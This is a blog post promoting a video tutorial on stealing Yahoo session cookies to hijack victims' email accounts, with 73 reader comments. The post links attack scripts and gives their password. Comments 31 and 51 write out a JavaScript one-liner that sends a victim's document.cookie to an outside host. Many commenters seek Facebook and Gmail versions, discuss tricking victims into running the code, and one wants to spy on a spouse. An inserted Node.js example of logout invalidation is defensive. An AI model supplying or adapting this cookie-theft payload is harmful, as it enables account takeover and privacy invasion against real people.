Contents of the video:

* Basics of the attack
* Definition of session cookies
* Why only a Yahoo account
* Stealing session cookies
* Using stolen cookies to access a Yahoo account without credentials
* Demonstration of the attack using two different browsers

Requirement: Download the scripts from here.
The password to access one of the scripts is 'explore'.

* This attack is working today (at the time of writing). The vulnerability might be patched by the respective organisations at any time.





Note: I have written the same article here. It's not a video tutorial. Thanks to Mr. Mohit, admin of
cyberarmy.in, for publishing it.

Feel free to ask any queries in the comments regarding the tutorial or the PHP code of the scripts.

73 comments:

  1. Nice post, well explained. Next time, it will be better to say things than using a text editor.

    What about Gmail?

  2. Thanks for your suggestion and feedback.

    Session cookies are destroyed and become useless as the victim clicks 'Sign out' in Gmail, so the attacker gets logged out too.

  3. Nice post, but it does not work, because I checked on my5.gb: I click haked.php, a window comes up and I give the password ''explore'', and after that no ID is shown. Can I ask why this happens?
    Please tell me what should be done.

  4. I just tried again and it's working. Did you get cookies in the 'cookies' directory you made? What happened when you ran the JavaScript in the browser (victim's side)?

  5. Tell you what, this appears to only steal their email cookie, which "technically" means they have to be logged into their Yahoo email. I don't think this script will steal their chat cookie. I myself have never really messed with Yahoo's cookies, so I can only assume. However, this would be funny if you could send a link to the chat room and anyone who clicks on it, it would steal their Yahoo cookie and allow you to log in to their account.

  6. Very neat. Getting someone to copy and paste that would be the challenge.

  7. @ZaraByte Thanks for your feedback. No, not chat cookies. Yeah, of course one needs to be logged into his account. :)

    @The DIY guy Thanks. Yeah, good social engineering is required to get someone to copy this.

  8. It's not working, can't get cookies in the cookies folder or even in hacked.php...

  9. What happened when you ran the JavaScript in the browser (victim's side)? Does it give any error or what?

  10. not working.. !!

  11. Hopefully the vulnerability has not been patched by Yahoo yet. I checked 3 days ago. Kindly mention your query in detail.

  12. I think we still need modification to hack a Facebook account, heheheh

  13. Hi, I uploaded the files to my3gb.com, but when the victim runs the JavaScript code it displays the following and no cookie is created in hacked.php
    ===========
    chmod???
    ===========

  14. Make sure that you have created a directory 'cookies' where cookies would be collected.

  15. Nice... It was working excellently, and thanks for giving such great knowledge. Now I have a question: "Is it possible to delete anyone's Facebook profile?" Please tell me, because someone said that yes, it is. So please explain the procedure of deletion and how to protect our account.

  16. Maybe you are also stealing our cookies with code in the PHP file, when we open it for checking the password, and it stores them on your server?

    Lemme explore its code and report back. :)

    And one more thing, someone here:

    http://www.cyberarmy.in/2011/02/hack-yahoo-accounts-with-session-ids-or.html

    wrote that this method stopped working, Yahoo fixed this issue.

    According to me, the cookies issue can never be fixed. Is it working now, or is the bug really fixed??

  17. We can also use a manual cookie edit plugin :) once we have cookies from victims.

  18. You used this variable "$X44" and it's not defined in your script??

    What does it do, huh?

    And also clear up my doubt: when I run the JavaScript directly in the browser, it's working fine.

    But when I try to run it via a hyperlink or image hyperlink, it shows 2 errors in the browser and redirects to the Yahoo home page, and cookies are not generated with this method (hyperlink).

    Errors are:


    Notice: Undefined offset: 1 in here_link_of_my_site\yahoo.php on line 15

    Notice: Undefined offset: 1 in here_link_of_my_site\yahoo.php on line 17

  19. I wonder why you did not allow my previous comments :D and you deleted them.

    The reason behind it may be that your script is suspicious.

  20. The bug is not that we can access the account by stolen cookies. The bug is that the cookies are not destroyed on clicking "sign out".

    You have to run this code in the same tab where the Yahoo account is opened. Then how are you doing this job through a link?
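
The server-side fix for the behaviour comment 20 describes, as an added example that is not part of the original post or its scripts: sign-out deletes the session record so a copied cookie value stops working, and the cookie is issued with `HttpOnly` so page script cannot read it through `document.cookie`. The `SessionStore` class, the `sid` cookie name and the 15-minute idle timeout are assumptions made for illustration.

```javascript
const { randomBytes } = require('crypto');

const IDLE_TIMEOUT_MS = 15 * 60 * 1000; // assumed policy value

class SessionStore {
  constructor() { this.sessions = new Map(); } // sid -> { user, lastSeen }

  // Issue a fresh random identifier at every login.
  login(user, now = Date.now()) {
    const sid = randomBytes(32).toString('hex');
    this.sessions.set(sid, { user, lastSeen: now });
    return sid;
  }

  // Resolve a presented cookie value to a user, or null if unknown or idle too long.
  authenticate(sid, now = Date.now()) {
    const s = this.sessions.get(sid);
    if (!s) return null;
    if (now - s.lastSeen > IDLE_TIMEOUT_MS) { this.sessions.delete(sid); return null; }
    s.lastSeen = now;
    return s.user;
  }

  // Sign-out must delete the server-side record, not only clear the browser cookie.
  logout(sid) { return this.sessions.delete(sid); }
}

// HttpOnly hides the value from document.cookie; Secure and SameSite limit where it is sent.
function sessionCookieHeader(sid) {
  return `sid=${sid}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Sent on sign-out so the browser also drops its copy.
function clearCookieHeader() {
  return 'sid=; Path=/; Max-Age=0; HttpOnly; Secure; SameSite=Lax';
}

// Constructed scenario: a copied cookie value is presented again after the owner signs out.
function replayAfterLogout() {
  const store = new SessionStore();
  const sid = store.login('alice@example.test');
  const copied = sid;                        // value obtained while the session was live
  const before = store.authenticate(copied); // accepted: record still exists
  store.logout(sid);
  const after = store.authenticate(copied);  // rejected: record was deleted at sign-out
  return { before, after };
}
```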

  21. Cookies are never destroyed by sign-out. It's the same case for Orkut, Google, Yahoo etc. Cookies remain the same and are kept stored on the server when we sign out.

    So I think you should also try Gmail and Rediffmail using this method. You just need to identify the cookies which are responsible for sign-in (mail).

  22. Simply do you think, we can access any account using session cookies once stolen because these are never destroyed ?

  23. Awesome, works perfectly... can I get one like this for Gmail please??

  24. @aneesh, yes, it works for Orkut and Gmail also. For Gmail, some time ago it was working to log in using cookies.

  25. Please tell me, can we do that for other websites like Orkut instead of Yahoo, and what do we have to do for that? What changes should we make in it? Please help.

  26. Please tell me, can we do that for other websites like Orkut instead of Yahoo? And what changes should we make for that? Please help.

  27. You would have to change the whole code for Gmail.


    I repeat that you won't remain logged in after the slave clicks "sign out" in Gmail.

  28. @Aneesh M.Maker And what about Facebook, sir? The coding of which file do we need to change? Please guide me with that.

  29. Hello, I tried but it is not working for me..

  30. Hey, everything is working up to stealing the cookie, but when I get to the hacking page and click on the link to get to that user's account, it returns "Sorry, the page you requested was not found". Can I get some help here please? I think it's just the link that needs to be modified.

    Thank You

  31. Does anyone have the script to steal cookies for Gmail? And also, when I email javascript:document.location='http://jsofferin.my3gb.com/yahoo.php?ex='.concat(escape(document.cookie)); Yahoo disables href=

  32. @aneesh..... yahoo.php is not working, yar... and how do we use it
    on Facebook :)

  33. I would like to write a PHP script for Facebook now..

  34. But can you convert the java code to an active link for the victim to click??

  35. But can you convert the java code to an active link for the victim to click??

  36. Can you convert the code to an active link??

  37. This can be converted into a link using the JavaScript "onclick" event, but we cannot send JavaScript in email.

  38. Nice trick, but does this method work on a Gmail account?

  39. cool

  40. Cool, but does this method work on a Google account?

  41. Hey, when I download the file I see only one file that says "cookiesstealer"

  42. Really amazing

  43. First, ty for the tutorial.. it was helpful, but let's say I got the token and I can get to the victim's inbox and his cookie too, but what else can I do.. I can't log in to the account info page because I don't have the pw, as you know, so is there any way to log in to the info page without the pw or what?

  44. Thanks a lot for explaining this topic.
    Please, I have something to say.
    You said that I have to enter the password given by your site.
    How can I register to be a member at your site and have a password?

  45. Well explained!

  46. interesting tutorial, thx!!!

  47. Can someone help me?
    When I run the script, an error occurs:
    Notice: Undefined variable: X44 in yahoo.php on line 9
    Please help me to run it without error,
    and what is X44?
    I await a reply.

  48. Knowing the password of an account of yahoo messenger / email from ...registry, is there,knows who knows!!!

  49. Hacking is not as easy as you guys think........:D

  50. Can someone help me?
    When I run the script, an error occurs:
    Notice: Undefined variable: X44 in yahoo.php on line 9
    Please help me to run it without error,
    and what is X44?
    I await a reply.

  51. The code that the victim should click on... it's not coming as a link... it's just in simple format... please help...

    javascript:document.location
    ='http://shreya6633.my3gb.com/yahoo.php?ex='.concat
    (escape(document.cookie));

    Is it right?

  52. It's nice, but please can you tell how to steal Facebook cookies... please reply...

  53. Hey, I am new to PHP. I learnt a few codes but I can't open them. I downloaded WAMP Server 5, but no use. Someone please help me with this.

  54. It really works.... but please can you tell me how to steal cookies of Facebook. Please

  55. It works, but please can you tell me how to steal cookies of Facebook... please tell me

  56. Can you tell me how to steal Facebook cookies..... please tell me

  57. Hi, I uploaded the files to my3gb.com, but when the victim runs the JavaScript code it displays the following and no cookie is created in hacked.php
    ===========
    chmod???
    ===========

    and redirected

  58. no cookies is created.......

  59. Hey bro.. great explanation..
    but not working.. don't know why..
    I did as you said; it is also redirected to the Yahoo mail page, but when hacked.php is opened there is nothing.. no data collected.
    Does whether it works depend on the browser???
    All the above guys who had success with this method, please tell us your web browser..

    Please help me

  60. Can you kindly upload this video tutorial again, please?

  61. A cookie is created, however, when I click on it, it says "page cannot be displayed" "currently unavailable". Has Yahoo maybe fixed this? Can someone try?

  62. Hello sir,
    Can you also upload GMAIL COOKIE STEALER?

  63. Hello bro, please add a Facebook and Gmail stealer :) Best regards, REXUS351 <= thanks to moh1t also for attacking my website :))

  64. Hey, is there any other way to execute JavaScript other than copying it into the browser?
    Can we execute JavaScript on a remote computer by any means other than remote computer hacking?

  65. Hey, is there any other way to execute JavaScript other than copying it into the browser?
    Can we execute JavaScript on a remote computer by any means other than remote computer hacking?

  66. Hello brother, I need to know how I can make a cookie into link form to send the victim a link???? Please reply. Nice tut.

  67. Where the fuck is the download link? Post a new download link
    ASAP!!

  68. upload again

  69. Please upload your video again!

  70. I want to hack my husband's account because I believe he is fooling around with his co-worker. Help please; if he does, I will dump him soon.

  71. I can't even download the file

  72. Your video has been removed. Can you please send it to me?
    My email address = aadil93051@gmail.com

  73. the video has been deleted
